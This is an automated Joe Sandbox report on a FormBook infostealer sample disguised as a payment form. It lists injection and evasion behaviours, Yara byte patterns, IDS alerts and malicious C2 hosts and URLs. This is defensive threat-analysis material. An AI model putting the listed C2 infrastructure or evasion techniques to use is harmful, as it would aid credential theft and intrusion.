Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Form+Inquiry LIST.exe

Overview

General Information

Sample name:Payment Form+Inquiry LIST.exe
Analysis ID:1475677
MD5:7f8d840982ad0a6c999a3a35e2bff6c1
SHA1:aec4c33c4513d9b7d1a9d01ed5234a060e4a6481
SHA256:b7ca9f28528677ff0664ea5968a23f19c454b72c54dcaeca4cc1c3173e6f80bc
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Payment Form+Inquiry LIST.exe (PID: 7560 cmdline: "C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe" MD5: 7F8D840982AD0A6C999A3A35E2BFF6C1)
    • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 7652 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
      • QYzBgoBGBcxProZWs.exe (PID: 712 cmdline: "C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • findstr.exe (PID: 7860 cmdline: "C:\Windows\SysWOW64\findstr.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • QYzBgoBGBcxProZWs.exe (PID: 692 cmdline: "C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8104 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2e0d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17712:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000007.00000002.3791387211.0000000002E40000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3791387211.0000000002E40000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2abd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1420f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000007.00000002.3791432019.0000000002E80000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.2.vbc.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.vbc.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d2d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16912:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          3.2.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            3.2.vbc.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e0d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17712:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:07/18/24-08:16:35.708258
            SID:2855464
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:15:55.343618
            SID:2855465
            Source Port:49709
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:18:13.794575
            SID:2855465
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:18:08.711636
            SID:2855464
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:18:38.635194
            SID:2855464
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:16:22.150762
            SID:2855464
            Source Port:49712
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:19:02.667403
            SID:2855464
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:17:07.218585
            SID:2855464
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:17:55.148563
            SID:2855464
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:19:05.208740
            SID:2855464
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:17:15.304574
            SID:2855465
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:18:06.178094
            SID:2855464
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:18:51.948964
            SID:2855464
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:18:57.038338
            SID:2855465
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:17:09.840500
            SID:2855464
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:16:40.771371
            SID:2855465
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:18:49.409930
            SID:2855464
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:18:36.102586
            SID:2855464
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:16:27.240205
            SID:2855465
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:16:33.167058
            SID:2855464
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:16:19.614946
            SID:2855464
            Source Port:49711
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:17:52.606554
            SID:2855464
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:19:10.273647
            SID:2855465
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:18:00.211462
            SID:2855465
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/18/24-08:18:43.710583
            SID:2855465
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Suricata Signatures

            Timestamp:2024-07-18T08:18:14.453133+0200
            SID:2050745
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-18T08:18:57.570305+0200
            SID:2050745
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-18T08:18:11.881553+0200
            SID:2855464
            Source Port:49729
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:17:02.163543+0200
            SID:2855465
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:18:44.354120+0200
            SID:2855465
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:17:58.293086+0200
            SID:2855464
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:16:39.745635+0200
            SID:2855464
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:19:11.204667+0200
            SID:2050745
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-18T08:18:41.801176+0200
            SID:2855464
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:17:47.252891+0200
            SID:2855465
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:17:47.252891+0200
            SID:2050745
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-18T08:16:20.079013+0200
            SID:2855464
            Source Port:49711
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:17:55.756640+0200
            SID:2855464
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:18:57.570305+0200
            SID:2855465
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:17:12.847063+0200
            SID:2855464
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:16:27.704677+0200
            SID:2050745
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-18T08:17:07.672872+0200
            SID:2855464
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:18:55.043396+0200
            SID:2855464
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:16:22.641237+0200
            SID:2855464
            Source Port:49712
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:19:06.130591+0200
            SID:2855464
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:19:03.581277+0200
            SID:2855464
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:18:06.824901+0200
            SID:2855464
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:19:08.617677+0200
            SID:2855464
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:18:14.453133+0200
            SID:2855465
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:18:52.810773+0200
            SID:2855464
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:17:02.163543+0200
            SID:2050745
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-18T08:18:44.354120+0200
            SID:2050745
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-18T08:18:49.928508+0200
            SID:2855464
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:18:00.826691+0200
            SID:2050745
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-18T08:17:53.209829+0200
            SID:2855464
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:15:55.872871+0200
            SID:2855465
            Source Port:49709
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:16:37.214368+0200
            SID:2855464
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:16:25.187168+0200
            SID:2855464
            Source Port:49713
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:18:09.326768+0200
            SID:2855464
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:18:39.270968+0200
            SID:2855464
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:17:11.356835+0200
            SID:2855464
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:18:00.826691+0200
            SID:2855465
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:19:11.204667+0200
            SID:2855465
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:16:34.683122+0200
            SID:2855464
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:18:36.737717+0200
            SID:2855464
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-18T08:15:55.872871+0200
            SID:2050745
            Source Port:49709
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-18T08:16:27.704677+0200
            SID:2855465
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.lavillitadepapa.com/i1fz/?mZytyNB=69+72+ftTFcgCPV1pfBGcRAhZJTRakO2Kh+ZkvubWnSJrIurKkpNo2aBygpvSICGeoPjDFn9pekXwSuquQeAgXbnoNXGqYnuCVvRNE6ZSnCvZlL6jw==&54D0m=gvohHHH0Avira URL Cloud: Label: malware
            Source: https://www.lavillitadepapa.com/i1fz/?mZytyNB=69Avira URL Cloud: Label: malware
            Source: http://www.mybodyradar.net/nml2/Avira URL Cloud: Label: malware
            Source: http://www.lavillitadepapa.com/i1fz/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: mybodyradar.netVirustotal: Detection: 10%Perma Link
            Source: www.kosherphonestore.comVirustotal: Detection: 5%Perma Link
            Multi AV Scanner detection for submitted file
            Source: Payment Form+Inquiry LIST.exeVirustotal: Detection: 56%Perma Link
            Source: Payment Form+Inquiry LIST.exeReversingLabs: Detection: 57%
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3791387211.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3791432019.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1580637311.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3793025669.0000000005700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1581046777.0000000005730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3789791469.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Payment Form+Inquiry LIST.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: findstr.pdbGCTL source: vbc.exe, 00000003.00000002.1580505880.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000005.00000002.3786167586.00000000014CE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: findstr.exe, 00000007.00000002.3790938279.0000000002BB3000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3792132594.000000000367C000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1922034773.000000002F70C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QYzBgoBGBcxProZWs.exe, 00000005.00000000.1504924676.00000000006CE000.00000002.00000001.01000000.00000005.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3782981021.00000000006CE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: findstr.pdb source: vbc.exe, 00000003.00000002.1580505880.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000005.00000002.3786167586.00000000014CE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.1580674162.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.1582748260.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, findstr.exe, 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.1580674162.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.1582748260.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: vbc.pdb source: findstr.exe, 00000007.00000002.3790938279.0000000002BB3000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3792132594.000000000367C000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1922034773.000000002F70C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006DBF10 FindFirstFileW,FindNextFileW,FindClose,7_2_006DBF10
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 4x nop then push rdi0_2_00007FF6E8300A40
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 4x nop then push r140_2_00007FF6E835E2E0
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 4x nop then push rbx0_2_00007FF6E82D2370
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 4x nop then push rsi0_2_00007FF6E82D2370
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 4x nop then push rbx0_2_00007FF6E82D2370
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 4x nop then push rbx0_2_00007FF6E82D2370
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 4x nop then push rbx0_2_00007FF6E82D2370
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 4x nop then push rbx0_2_00007FF6E82D2370
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 4x nop then push rbx0_2_00007FF6E82D2370
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 4x nop then push rbx0_2_00007FF6E82D2370
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 4x nop then push rsi0_2_00007FF6E82D2370
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 4x nop then push rdi0_2_00007FF6E82D2370
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 4x nop then push rsi0_2_00007FF6E82D2680
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 4x nop then push rbx0_2_00007FF6E8251988
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 4x nop then push rbx0_2_00007FF6E8251988
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 4x nop then push rsi0_2_00007FF6E83008C0
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 4x nop then push rsi0_2_00007FF6E8300910
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 4x nop then xor eax, eax7_2_006C9830
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 4x nop then pop edi7_2_006D24A9
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 4x nop then pop edi7_2_006D2487
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 4x nop then mov ebx, 00000004h7_2_03300548

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49709 -> 23.227.38.74:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49711 -> 84.32.84.101:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49712 -> 84.32.84.101:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49714 -> 84.32.84.101:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49715 -> 43.155.26.241:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49716 -> 43.155.26.241:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49718 -> 43.155.26.241:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49719 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49720 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49722 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49723 -> 203.161.55.102:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49724 -> 203.161.55.102:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49726 -> 203.161.55.102:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49727 -> 108.179.193.98:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49728 -> 108.179.193.98:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49730 -> 108.179.193.98:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49731 -> 35.241.34.216:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49732 -> 35.241.34.216:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49734 -> 35.241.34.216:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49735 -> 74.208.46.171:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49736 -> 74.208.46.171:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49738 -> 74.208.46.171:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49739 -> 154.92.52.196:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49740 -> 154.92.52.196:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49742 -> 154.92.52.196:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.mg55aa.xyz
            Source: Joe Sandbox ViewIP Address: 43.155.26.241 43.155.26.241
            Source: Joe Sandbox ViewIP Address: 203.161.55.102 203.161.55.102
            Source: Joe Sandbox ViewASN Name: LILLY-ASUS LILLY-ASUS
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
